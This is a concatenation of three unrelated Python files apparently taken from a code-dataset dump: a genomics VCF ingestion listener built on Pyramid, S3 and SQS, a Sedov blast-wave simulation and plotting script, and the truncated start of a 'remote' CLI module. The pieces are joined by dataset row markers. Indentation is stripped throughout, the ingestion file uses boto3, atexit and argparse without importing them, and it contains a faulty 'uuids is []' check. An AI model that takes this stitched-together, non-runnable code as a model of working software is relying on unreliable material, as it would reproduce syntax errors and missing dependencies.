import botocore.exceptions
import cgi
import datetime
import elasticsearch
import io
import json
import os
import psycopg2
import re
import requests # XXX: C4-211 should not be needed but is // KMP needs this, too, until subrequest posts work
import signal
import structlog
import threading
import time
import webtest
import tempfile
from dcicutils.env_utils import is_stg_or_prd_env
from dcicutils.misc_utils import VirtualApp, ignored, check_true, full_class_name, environ_bool, PRINT
from pyramid import paster
from pyramid.httpexceptions import HTTPNotFound, HTTPMovedPermanently # , HTTPServerError
from pyramid.request import Request
# Possibly still needed by some commented-out code.
# from pyramid.response import Response
from pyramid.view import view_config
from snovault.util import debug_log
from vcf import Reader
from .ingestion.vcf_utils import VCFParser, StructuralVariantVCFParser
from .commands.reformat_vcf import runner as reformat_vcf
from .commands.add_altcounts_by_gene import main as add_altcounts
from .ingestion.common import metadata_bundles_bucket, get_parameter, IngestionReport
from .ingestion.exceptions import UnspecifiedFormParameter, SubmissionFailure # , BadParameter
from .ingestion.processors import get_ingestion_processor
# from .types.base import get_item_or_none
from .types.ingestion import SubmissionFolio, IngestionSubmission
from .util import (
resolve_file_path, gunzip_content,
debuglog, get_trusted_email, beanstalk_env_from_request,
subrequest_object, register_path_content_type, vapp_for_email, vapp_for_ingestion,
)
from .ingestion.queue_utils import IngestionQueueManager
from .ingestion.variant_utils import VariantBuilder, StructuralVariantBuilder
log = structlog.getLogger(__name__)
EPILOG = __doc__
INGESTION_QUEUE = 'ingestion_queue'
VARIANT_SCHEMA = resolve_file_path('./schemas/variant.json')
VARIANT_SAMPLE_SCHEMA = resolve_file_path('./schemas/variant_sample.json')
STATUS_QUEUED = 'Queued'
STATUS_INGESTED = 'Ingested'
STATUS_DISABLED = 'Ingestion disabled'
STATUS_ERROR = 'Error'
STATUS_IN_PROGRESS = 'In progress'
SHARED = 'shared'
STRUCTURAL_VARIANT_SCHEMA = resolve_file_path("./schemas/structural_variant.json")
STRUCTURAL_VARIANT_SAMPLE_SCHEMA = resolve_file_path(
"./schemas/structural_variant_sample.json"
)
def includeme(config):
# config.add_route('process_ingestion', '/process_ingestion')
config.add_route('queue_ingestion', '/queue_ingestion')
config.add_route('ingestion_status', '/ingestion_status')
config.add_route('submit_for_ingestion', '/submit_for_ingestion')
config.registry[INGESTION_QUEUE] = IngestionQueueManager(config.registry)
config.scan(__name__)
SUBMISSION_PATTERN = re.compile(r'^/ingestion-submissions/([0-9a-fA-F-]+)(|/.*)$')
register_path_content_type(path='/submit_for_ingestion', content_type='multipart/form-data')
def extract_submission_info(request):
matched = SUBMISSION_PATTERN.match(request.path_info)
if matched:
submission_id = matched.group(1)
else:
raise SubmissionFailure("request.path_info is not in the expected form: %s" % request.path_info)
instance = subrequest_object(request, submission_id)
return submission_id, instance
@view_config(name='submit_for_ingestion', request_method='POST', context=IngestionSubmission,
# Apparently adding this 'accept' causes discrimination on incoming requests not to find this method.
# We do want this type, and instead we check the request to make sure we got it, but we omit it here
# for practical reasons. -kmp 10-Sep-2020
# accept='multipart/form-data',
permission='edit')
@debug_log
def submit_for_ingestion(context, request):
ignored(context)
check_true(request.content_type == 'multipart/form-data', # even though we can't declare we accept this
"Expected request to have content_type 'multipart/form-data'.", error_class=SubmissionFailure)
bs_env = beanstalk_env_from_request(request)
bundles_bucket = metadata_bundles_bucket(request.registry)
datafile = request.POST['datafile']
if not isinstance(datafile, cgi.FieldStorage):
# e.g., specifically it might be b'' when no file is selected,
# but IMPORTANTLY, cgi.FieldStorage has no predefined boolean value,
# so we can't just ask to check 'not datafile'. Sigh. -kmp 5-Aug-2020
raise UnspecifiedFormParameter('datafile')
filename = datafile.filename
override_name = request.POST.get('override_name', None)
parameters = dict(request.POST) # Convert to regular dictionary, which is also a copy
parameters['datafile'] = filename
# Other parameters, like validate_only, will ride in on parameters via the manifest on s3
submission_id, instance = extract_submission_info(request)
# The three arguments institution, project, and ingestion_type were needed in the old protocol
# but are not needed in the new protocol because someone will have set up the IngestionSubmission
# object already with the right values. We tolerate them here, but we insist they be consistent (redundant).
# Note, too, that we use the 'update=True' option that causes them to be added to our parameters if they are
# missing, defaulted from the previous item, so that they will be written to the parameter block stored on S3.
# (We could do that differently now, by looking them up dynamically, but rather than risk making a mistake,
# I just went with path of least resistance for now.)
# -kmp 2-Dec-2020
institution = instance['institution']['@id']
institution_arg = get_parameter(parameters, "institution", default=institution, update=True)
if institution_arg != institution:
# If the "institution" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'institution' was supplied inconsistently for submit_for_ingestion.")
project = instance['project']['@id']
project_arg = get_parameter(parameters, "project", default=project, update=True)
if project_arg != project:
# If the "project" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'project' was supplied inconsistently for submit_for_ingestion.")
ingestion_type = instance['ingestion_type']
ingestion_type_arg = get_parameter(parameters, "ingestion_type", default=ingestion_type, update=True)
if ingestion_type_arg != ingestion_type:
# If the "ingestion_type" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'ingestion_type' was supplied inconsistently for submit_for_ingestion.")
# ``input_file`` contains the actual file data which needs to be
# stored somewhere.
input_file_stream = request.POST['datafile'].file
input_file_stream.seek(0)
# NOTE: Some reference information about uploading files to s3 is here:
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-uploading-files.html
# submission.set_item_detail(object_name=manifest['object_name'], parameters=manifest['parameters'],
# institution=institution, project=project)
# submission_id = str(uuid.uuid4())
_, ext = os.path.splitext(filename)
object_name = "{id}/datafile{ext}".format(id=submission_id, ext=ext)
manifest_name = "{id}/manifest.json".format(id=submission_id)
s3_client = boto3.client('s3')
upload_time = datetime.datetime.utcnow().isoformat()
success = True
message = "Uploaded successfully."
try:
s3_client.upload_fileobj(input_file_stream, Bucket=bundles_bucket, Key=object_name)
except botocore.exceptions.ClientError as e:
log.error(e)
success = False
message = "{error_type}: {error_message}".format(error_type=full_class_name(e), error_message=str(e))
# This manifest will be stored in the manifest.json file on on s3 AND will be returned from this endpoint call.
manifest_content = {
"filename": filename,
"object_name": object_name,
"submission_id": submission_id,
"submission_uri": SubmissionFolio.make_submission_uri(submission_id),
"beanstalk_env_is_prd": is_stg_or_prd_env(bs_env),
"beanstalk_env": bs_env,
"bucket": bundles_bucket,
"authenticated_userid": request.authenticated_userid,
"email": get_trusted_email(request, context="Submission", raise_errors=False),
"success": success,
"message": message,
"upload_time": upload_time,
"parameters": parameters,
}
manifest_content_formatted = json.dumps(manifest_content, indent=2)
if success:
try:
with io.BytesIO(manifest_content_formatted.encode('utf-8')) as fp:
s3_client.upload_fileobj(fp, Bucket=bundles_bucket, Key=manifest_name)
except botocore.exceptions.ClientError as e:
log.error(e)
message = ("{error_type} (while uploading metadata): {error_message}"
.format(error_type=full_class_name(e), error_message=str(e)))
raise SubmissionFailure(message)
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids([submission_id], ingestion_type=ingestion_type)
if failed:
# If there's a failure, failed will be a list of one problem description since we only submitted one thing.
raise SubmissionFailure(failed[0])
if not success:
raise SubmissionFailure(message)
return manifest_content
@view_config(route_name='ingestion_status', request_method='GET', permission='index')
@debug_log
def ingestion_status(context, request):
""" Status route, essentially identical to indexing_status. """
ignored(context)
queue_manager = request.registry[INGESTION_QUEUE]
n_waiting, n_inflight = queue_manager.get_counts()
return {
'title': 'Ingestion Status',
'waiting': n_waiting,
'inflight': n_inflight
}
DEBUG_SUBMISSIONS = environ_bool("DEBUG_SUBMISSIONS", default=False)
def process_submission(*, submission_id, ingestion_type, app, bundles_bucket=None, s3_client=None):
bundles_bucket = bundles_bucket or metadata_bundles_bucket(app.registry)
s3_client = s3_client or boto3.client('s3')
manifest_name = "{id}/manifest.json".format(id=submission_id)
data = json.load(s3_client.get_object(Bucket=bundles_bucket, Key=manifest_name)['Body'])
email = None
try:
email = data['email']
except KeyError as e:
debuglog("Manifest data is missing 'email' field.")
if DEBUG_SUBMISSIONS:
pass
# import pdb; pdb.set_trace()
debuglog("processing submission %s with email %s" % (submission_id, email))
with vapp_for_email(email=email, app=app) as vapp:
if DEBUG_SUBMISSIONS:
PRINT("PROCESSING FOR %s" % email)
submission = SubmissionFolio(vapp=vapp, ingestion_type=ingestion_type, submission_id=submission_id, log=None)
handler = get_ingestion_processor(ingestion_type)
result = handler(submission)
if DEBUG_SUBMISSIONS:
PRINT("DONE PROCESSING FOR %s" % email)
return {
"result": result,
"ingestion_type": ingestion_type,
"submission_id": submission_id,
}
def verify_vcf_file_status_is_not_ingested(request, uuid, *, expected=True):
""" Verifies the given VCF file has not already been ingested by checking
'file_ingestion_status'
"""
kwargs = {
'environ': request.environ,
'method': 'GET',
'content_type': 'application/json'
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = request.invoke_subrequest(subreq)
if isinstance(resp, HTTPMovedPermanently): # if we hit a redirect, follow it
subreq = Request.blank(resp.location, **kwargs)
resp = request.invoke_subrequest(subreq)
log.info('VCF File Meta: %s' % resp.json)
verified = bool(expected) is (resp.json.get('file_ingestion_status', None) != STATUS_INGESTED)
# if not verified:
# import pdb; pdb.set_trace()
return verified
def patch_vcf_file_status(request, uuids):
""" Patches VCF File status to 'Queued'
NOTE: This process makes queue_ingestion not scale terribly well.
Batching above a certain number may result in 504. There are
also permissions concerns here that are not dealt with.
"""
for uuid in uuids:
kwargs = {
'environ': request.environ,
'method': 'PATCH',
'content_type': 'application/json',
'POST': json.dumps({
'file_ingestion_status': STATUS_QUEUED
}).encode('utf-8')
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = None
try:
if verify_vcf_file_status_is_not_ingested(request, uuid):
resp = request.invoke_subrequest(subreq)
except HTTPNotFound:
log.error('Tried to patch %s but item does not exist: %s' % (uuid, resp))
@view_config(route_name='queue_ingestion', request_method='POST', permission='index')
@debug_log
def queue_ingestion(context, request):
""" Queues uuids as part of the request body for ingestion. Can batch as many as desired in a
single request.
"""
ignored(context)
uuids = request.json.get('uuids', [])
override_name = request.json.get('override_name', None)
return enqueue_uuids_for_request(request, uuids, override_name=override_name)
def enqueue_uuids_for_request(request, uuids, *, ingestion_type='vcf', override_name=None):
response = {
'notification': 'Failure',
'number_queued': 0,
'detail': 'Nothing was queued. Make sure to past in a list of uuids in in "uuids" key.'
}
if uuids is []:
return response
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids(uuids)
if not failed:
response['notification'] = 'Success'
response['number_queued'] = len(uuids)
response['detail'] = 'Successfully queued the following uuids: %s' % uuids
if ingestion_type == 'vcf':
patch_vcf_file_status(request, uuids) # extra state management - may not be accurate, hard to get right
else:
response['number_queued'] = len(uuids) - len(failed)
response['detail'] = 'Some uuids failed: %s' % failed
return response
def get_queue_manager(request, *, override_name):
return (request.registry[INGESTION_QUEUE]
if not override_name
else IngestionQueueManager(request.registry, override_name=override_name))
class IngestionListener:
""" Organizes helper functions for the ingestion listener """
POLL_INTERVAL = 10 # seconds between each poll
INGEST_AS_USER = environ_bool('INGEST_AS_USER', default=True) # The new way, but possible to disable for now
def __init__(self, vapp, _queue_manager=None, _update_status=None):
self.vapp = vapp
# Get queue_manager
registry = None
if isinstance(self.vapp, (webtest.TestApp, VirtualApp)): # TestApp in testing or VirtualApp in production
registry = self.vapp.app.registry
elif _queue_manager is None: # if we got here, we cannot succeed in starting
raise Exception('Bad arguments given to IngestionListener: %s, %s, %s' %
(self.vapp, _queue_manager, _update_status))
self.queue_manager = IngestionQueueManager(registry) if not _queue_manager else _queue_manager
self.update_status = _update_status
@staticmethod
def should_remain_online(override=None):
""" A function that says whether 'run' should continue. This is provided because it
can be mocked in testing.
:param override: a lambda that will execute when evaluating if specified
:return: True if should stay running, False otherwise
"""
if not override:
return True
return override()
def get_messages(self):
""" Sleeps (as to not hit SQS too frequently) then requests messages,
returning the result bodies.
NOTE: THIS FUNCTION SHOULD NOT BE USED OUTSIDE OF THIS CODE SINCE
IT BLOCKS FOR RATE LIMITING REASONS
:return: messages available on SQS
"""
time.sleep(self.POLL_INTERVAL) # sleep here before polling again
return self.queue_manager.receive_messages()
def delete_messages(self, messages):
""" Deletes messages from SQS (after they have been processed). Does not return
anything but will log if messages fail deletion.
:param messages: messages to be deleted
"""
failed = self.queue_manager.delete_messages(messages)
while True:
debuglog("Trying to delete messages")
tries = 3
if failed:
debuglog("Failed to delete messages")
if tries > 0:
failed = self.queue_manager.delete_messages(failed) # try again
tries -= 1
else:
log.error('Failed to delete messages from SQS: %s' % failed)
break
else:
debuglog("Deleted messages")
break
def _patch_value(self, uuid, field, value):
""" Patches field with value on item uuid """
self.vapp.patch_json('/' + uuid, {field: value})
def patch_ingestion_report(self, report, uuid):
""" Sets the file_ingestion_error field of the given uuid """
if isinstance(report, IngestionReport): # handle normal case
self._patch_value(uuid, 'file_ingestion_error', report.get_errors())
elif isinstance(report, list): # handle when build_ingestion_error_report result is passed
self._patch_value(uuid, 'file_ingestion_error', report)
else:
raise TypeError('Got bad type for ingestion error report: %s' % report)
def set_status(self, uuid, status):
""" Sets the file_ingestion_status of the given uuid """
self._patch_value(uuid, 'file_ingestion_status', status)
@staticmethod
def build_ingestion_error_report(msg):
""" Builds an ingestion error report in case an error is encountered that cannot be recovered from
in VCF ingestion - see file_processed.json for structure definition. """
return [
{
'body': msg,
'row': -1 # this exception may have occurred on a particular row but since it could not be recovered
} # from we assume the msg has sufficient info to work backwards from - Will 4/9/21
]
def run(self):
""" Main process for this class. Runs forever doing ingestion as needed.
HIGH LEVEL LOGIC:
while True:
while there are messages available:
for each message:
download, decompress, ingest, patch file status to "Ingested"
delete processed messages
"""
log.info('Ingestion listener successfully online.')
debuglog("Ingestion listener started.")
messages = [] # This'll get a better value below in each loop iteration. This is just a declaration of intent.
def discard(msg):
self.delete_messages([msg])
# Assuming we didn't get an error trying to remove it,
# it should also get removed from our to-do list.
messages.remove(msg)
while self.should_remain_online():
debuglog("About to get messages.")
messages = self.get_messages() # wait here
debuglog("Got", len(messages), "messages.")
# ingest each VCF file
for message in messages:
debuglog("Message:", message)
body = json.loads(message['Body'])
uuid = body['uuid']
ingestion_type = body.get('ingestion_type', 'vcf') # Older protocol doesn't yet know to expect this
log.info('Ingesting uuid %s' % uuid)
if ingestion_type != 'vcf':
# Let's minimally disrupt things for now. We can refactor this later
# to make all the parts work the same -kmp
if self.INGEST_AS_USER:
try:
debuglog("REQUESTING RESTRICTED PROCESSING:", uuid)
process_submission(submission_id=uuid,
ingestion_type=ingestion_type,
# bundles_bucket=submission.bucket,
app=self.vapp.app)
debuglog("RESTRICTED PROCESSING DONE:", uuid)
except Exception as e:
log.error(e)
else:
submission = SubmissionFolio(vapp=self.vapp, ingestion_type=ingestion_type,
submission_id=uuid)
handler = get_ingestion_processor(ingestion_type)
try:
debuglog("HANDLING:", uuid)
handler(submission)
debuglog("HANDLED:", uuid)
except Exception as e:
log.error(e)
# If we suceeded, we don't need to do it again, and if we failed we don't need to fail again.
discard(message)
continue
debuglog("Did NOT process", uuid, "as", ingestion_type)
# locate file meta data
try:
file_meta = self.vapp.get('/' + uuid).follow().json
location = self.vapp.get(file_meta['href']).location
log.info('Got vcf location: %s' % location)
except Exception as e:
log.error('Could not locate uuid: %s with error: %s' % (uuid, e))
continue
# if this file has been ingested (or explicitly disabled), do not do anything with this uuid
if file_meta.get('file_ingestion_status', 'N/A') in [STATUS_INGESTED, STATUS_DISABLED]:
log.error('Skipping ingestion of file %s due to disabled ingestion status' % uuid)
continue
# attempt download with workaround
try:
raw_content = requests.get(location).content
except Exception as e:
log.error('Could not download file uuid: %s with error: %s' % (uuid, e))
continue
# gunzip content, pass to parser, post variants/variant_samples
# patch in progress status
self.set_status(uuid, STATUS_IN_PROGRESS)
# decoded_content = gunzip_content(raw_content)
# debuglog('Got decoded content: %s' % decoded_content[:20])
vcf_type = file_meta.get("variant_type", "SNV")
if vcf_type == "SNV":
# Apply VCF reformat
vcf_to_be_formatted = tempfile.NamedTemporaryFile(suffix='.gz')
vcf_to_be_formatted.write(raw_content)
formatted = tempfile.NamedTemporaryFile()
reformat_args = {
'inputfile': vcf_to_be_formatted.name,
'outputfile': formatted.name,
'verbose': False
}
reformat_vcf(reformat_args)
# Add altcounts by gene
# Note: you cannot pass this file object to vcf.Reader if it's in rb mode
# It's also not guaranteed that it reads utf-8, so pass explicitly
formatted_with_alt_counts = tempfile.NamedTemporaryFile(mode='w+', encoding='utf-8')
alt_counts_args = {
'inputfile': formatted.name,
'outputfile': formatted_with_alt_counts.name
}
add_altcounts(alt_counts_args)
parser = VCFParser(None, VARIANT_SCHEMA, VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_with_alt_counts))
variant_builder = VariantBuilder(self.vapp, parser, file_meta['accession'],
project=file_meta['project']['@id'],
institution=file_meta['institution']['@id'])
elif vcf_type == "SV":
# No reformatting necesssary for SV VCF
decoded_content = gunzip_content(raw_content)
debuglog('Got decoded content: %s' % decoded_content[:20])
formatted_vcf = tempfile.NamedTemporaryFile(
mode="w+", encoding="utf-8"
)
formatted_vcf.write(decoded_content)
formatted_vcf.seek(0)
parser = StructuralVariantVCFParser(
None,
STRUCTURAL_VARIANT_SCHEMA,
STRUCTURAL_VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_vcf),
)
variant_builder = StructuralVariantBuilder(
self.vapp,
parser,
file_meta["accession"],
project=file_meta["project"]["@id"],
institution=file_meta["institution"]["@id"],
)
try:
success, error = variant_builder.ingest_vcf()
except Exception as e:
# if exception caught here, we encountered an error reading the actual
# VCF - this should not happen but can in certain circumstances. In this
# case we need to patch error status and discard the current message.
log.error('Caught error in VCF processing in ingestion listener: %s' % e)
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(self.build_ingestion_error_report(msg=e), uuid)
discard(message)
continue
# report results in error_log regardless of status
msg = variant_builder.ingestion_report.brief_summary()
log.error(msg)
if self.update_status is not None and callable(self.update_status):
self.update_status(msg=msg)
# if we had no errors, patch the file status to 'Ingested'
if error > 0:
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(variant_builder.ingestion_report, uuid)
else:
self.set_status(uuid, STATUS_INGESTED)
discard(message)
# This is just fallback cleanup in case messages weren't cleaned up within the loop.
# In normal operation, they will be.
self.delete_messages(messages)
def run(vapp=None, _queue_manager=None, _update_status=None):
""" Entry-point for the ingestion listener for waitress. """
ingestion_listener = IngestionListener(vapp, _queue_manager=_queue_manager, _update_status=_update_status)
try:
ingestion_listener.run()
except Exception as e:
debuglog(str(e))
raise
class ErrorHandlingThread(threading.Thread):
""" Must be duplicated here so logging is correct. """
def run(self):
# interval = self._kwargs.get('interval', DEFAULT_INTERVAL)
interval = 60 # DB polling can and should be slower
update_status = self._kwargs['_update_status'] # noQA - uses private instance variables of parent class
while True:
try:
self._target(*self._args, **self._kwargs) # noQA - uses private instance variables of parent class
except (psycopg2.OperationalError, elasticsearch.exceptions.ConnectionError) as e:
# Handle database restart
log.warning('Database not there, maybe starting up: %r', e)
update_status(msg=repr(e))
log.debug('sleeping')
time.sleep(interval)
continue
except Exception as e:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in ingestion listener, restarting process at next request: %s' % e)
os.kill(os.getpid(), signal.SIGINT)
break
# Composite Application (for wsgi)
def composite(loader, global_conf, **settings):
""" This is a composite pyramid app, meant to run components of an application
or an application extension. In our case we are running the ingestion listener,
which requires executing a command with application context. This code lives
in encoded top-level as it is a wsgi entry-point. Note that the local deployment
does NOT run the listener this way, but runs the run method through main directly.
This code is heavily based off of the es_index_listener in snovault.
"""
listener = None
# Register before app creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
vapp = VirtualApp(app, environ)
timestamp = datetime.datetime.utcnow().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'msgs': []
},
}
def update_status(msg=None, **kw):
""" Method passed to run to update "global" status. """
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw) # can hold generic info
if msg is not None:
status['msgs'].append(msg)
status_holder['status'] = status
kwargs = {
'vapp': vapp,
'_update_status': update_status
}
# daemon thread that actually executes `run` method to call /index
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('WSGI Ingestion Listener Started')
listener.start()
# Register after virtualapp creation.
@atexit.register
def shutdown_listener():
""" Echo a statement at shutdown """
log.debug('shutting down listening thread')
def status_app(environ, start_response):
""" Allows you to get the status of the ingestion "manager". This will be much
more useful once multi-processing is thrown at ingestion.
"""
ignored(environ)
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
# Command Application (for waitress)
def main():
""" Entry point for the local deployment. """
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description='Listen for VCF File uuids to ingest',
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--app-name', help='Pyramid app name in configfile')
parser.add_argument('--username', '-u', default='IMPORT', help='Import username')
parser.add_argument('--dry-run', action='store_true', help='Do not post variants, just validate')
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
app = paster.get_app(args.config_uri, args.app_name)
config = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': args.username,
}
vapp = VirtualApp(app, config)
return run(vapp)
if __name__ == '__main__':
main()
| StarcoderdataPython |
15277 | <gh_stars>1-10
#Main Sedov Code Module
#Ported to python from fortran code written by <NAME> and <NAME>
#Original Paper and code found at http://cococubed.asu.edu/papers/la-ur-07-2849.pdf
import numpy as np
from globalvars import comvars as gv
from sedov_1d import sed_1d
from sedov_1d_time import sed_1d_time
from matplotlib import pyplot as plt
import pickle
gv.its = 20
# define sedov_main as a function
def sedov_main(geom_in, omega_in, time_in, blast_energy, gamma_in, outfile):
##Explicitly set variables
##Standard Cases
##Spherical constant density should reach r=1 at t=1
nstep = 12000
eblast = blast_energy
gv.xgeom = geom_in
gv.omega = omega_in
#outputfile = ??????
##input parameters
time = time_in
rho0 = 1.225E0
vel0 = 0.0E0
ener0 = 0.0E0
pres0 = 0.0E0
cs0 = 342.3E0
gv.gamma = gamma_in
##number of grid points, spatial domain, spatial stepsize.
##to match hydrocode output, use the mid-sell points.
#zpos = array of spatial points
zlo = 0.0E0
zhi = 1.2E3
zstep = (zhi - zlo)/float(nstep)
zpos = np.arange(zlo + zstep, zhi + zstep, zstep)
den, vel, pres, enertot, enertherm, enerkin, mach, zpos = sed_1d(time, nstep, zpos, eblast, rho0, vel0, ener0, pres0, cs0, gv)
#create final dictionary to pickle
###dictionary is a flexible array
single_time_output = {'density': den, 'velocity': vel, 'pressure': pres,
'total_energy': enertot, 'thermal_energy': enertherm,
'kinetic_energy': enerkin, 'mach': mach, 'position': zpos}
#open file, pickle and dump data, close file
output = open(outfile, 'wb')
pickle.dump(single_time_output, output)
output.close()
#plot outputs vss position
#zmax controls the maximum of the x-axis on the graphs.
zmax = 1.5 * gv.r2
plt.plot(zpos, den)
plt.axis([0, zmax, 0, max(den)])
plt.title('Density vs. Position')
plt.ylabel('Density (kg/m^3)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, vel)
plt.axis([0, zmax, 0, max(vel)])
plt.title('Velocity vs. Position')
plt.ylabel('Velocity (m/s)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, pres)
plt.axis([0, zmax, 0, max(pres)])
plt.title('Pressure vs. Position')
plt.ylabel('Pressure (Pa)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, enertot)
plt.axis([0, zmax, 0, max(enertot)])
plt.title('Total Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, enertherm)
plt.axis([0, zmax, 0, max(enertherm)])
plt.title('Thermal Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, enerkin)
plt.axis([0, zmax, 0, max(enerkin)])
plt.title('Kinetic Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, mach)
plt.axis([0, zmax, 0, max(mach)])
plt.title('Mach Number vs. Position')
plt.ylabel('Mach Number')
plt.xlabel('Position (m)')
plt.show()
#final graph plots scaled density, pressure and velocity one one plot.
plt.plot(zpos, den/max(den), 'b', label = 'Density')
plt.plot(zpos, pres/max(pres), 'g', label = 'Pressure')
plt.plot(zpos, vel/max(vel), 'r', label = 'Velocity')
plt.axis([0, zmax, 0, 1])
plt.legend(loc = 'upper left')
plt.title('Scaled Density, Pressure, and Velocity')
plt.ylabel('Scaled Value (x/max(x))')
plt.xlabel('Position (m)')
plt.show()
#define function to produce results at different points in time instead of sedov_1d
def sedov_main_time(geom_in, omega_in, time_initial, time_final, time_steps, blast_energy, gamma_in, outfile):
##Explicitly set variables
##Standard Cases
##Spherical constant density should reach r=1 at t=1
nstep = 12000
eblast = blast_energy
gv.xgeom = geom_in
gv.omega = omega_in
#outputfile = ??????
##input parameters
rho0 = 1.225E0
vel0 = 0.0E0
ener0 = 0.0E0
pres0 = 0.0E0
cs0 = 342.3E0
gv.gamma = gamma_in
##number of grid points, spatial domain, spatial stepsize.
##to match hydrocode output, use the mid-sell points.
#zpos = array of spatial points
zlo = 0.0E0
zhi = 3.0E2
zstep = (zhi - zlo)/float(nstep)
zposition = np.arange(zlo + zstep, zhi + zstep, zstep)
den_time, vel_time, pres_time, enertot_time, enertherm_time, enerkin_time, mach_time, zpos_time, time = sed_1d_time(time_initial, time_final, time_steps, nstep, zposition, eblast, rho0, vel0, ener0, pres0, cs0, gv)
#create final dictionary to pickle
###dictionary is flexible array
time_step_output = {'density': den_time, 'velocity': vel_time, 'pressure': pres_time,
'total_energy': enertot_time, 'thermal_energy': enertherm_time,
'kinetic_energy': enerkin_time, 'mach': mach_time,
'position': zpos_time, 'time': time}
#open file, pickle and dump data, close file
output = open(outfile, 'wb')
pickle.dump(time_step_output, output)
output.close()
#zmax controls the maximum of the x-axis on the graphs.
zmax = 1.5 * gv.r2
# for loops graph a plot for each time step in the final soulution
for i in range(0, time_steps):
plt.plot(zpos_time[i], den_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Density vs. Position')
plt.ylabel('Density (kg/m^3)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], vel_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Velocity vs. Position')
plt.ylabel('Velocity (m/s)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], pres_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Pressure vs. Position')
plt.ylabel('Pressure (Pa)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], enertot_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Total Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], enertherm_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Thermal Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], enerkin_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Kinetic Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], mach_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Mach Number vs. Position')
plt.ylabel('Mach Number')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
#final graph plots scaled density, pressure and velocity one one plot.
# plt.plot(zpos, den/max(den), 'b', label = 'Density')
# plt.plot(zpos, pres/max(pres), 'g', label = 'Pressure')
# plt.plot(zpos, vel/max(vel), 'r', label = 'Velocity')
# plt.axis([0, zmax, 0, 1])
# plt.legend(loc = 'upper left')
# plt.title('Scaled Density, Pressure, and Velocity')
# plt.ylabel('Scaled Value (x/max(x))')
# plt.xlabel('Position (m)')
# plt.show()
| StarcoderdataPython |
1760713 | <reponame>ob/remote
import logging
import re
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from functools import wraps
from pathlib import Path
from typing import List, Optional, Union
import click
from .configuration import WorkspaceConfig
from .configuration.discovery import get_configuration_medium, load_cwd_workspace_config, save_config
from .configuration.shared import HOST_REGEX, PATH_REGEX
from .exceptions import InvalidInputError, RemoteError
from .explain import explain
from .util import CommunicationOptions, ForwardingOptions
from .workspace import SyncedWorkspace
BASE_LOGGING_FORMAT = "%(message)s"
CONNECTION_STRING_FORMAT_REGEX = re.compile(f"^{HOST_REGEX}(:{PATH_REGEX})?$")
DEFAULT_CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
EXECUTION_CONTEXT_SETTINGS = dict(
help_option_names=["-h", "--help"], ignore_unknown_options=True, allow_interspersed_args=False
)
def log_exceptions(f):
"""A decorator that prints the custom exceptions and exit, but propagates internal ones"""
@wraps(f)
def wrapper(*args, **kwards):
try:
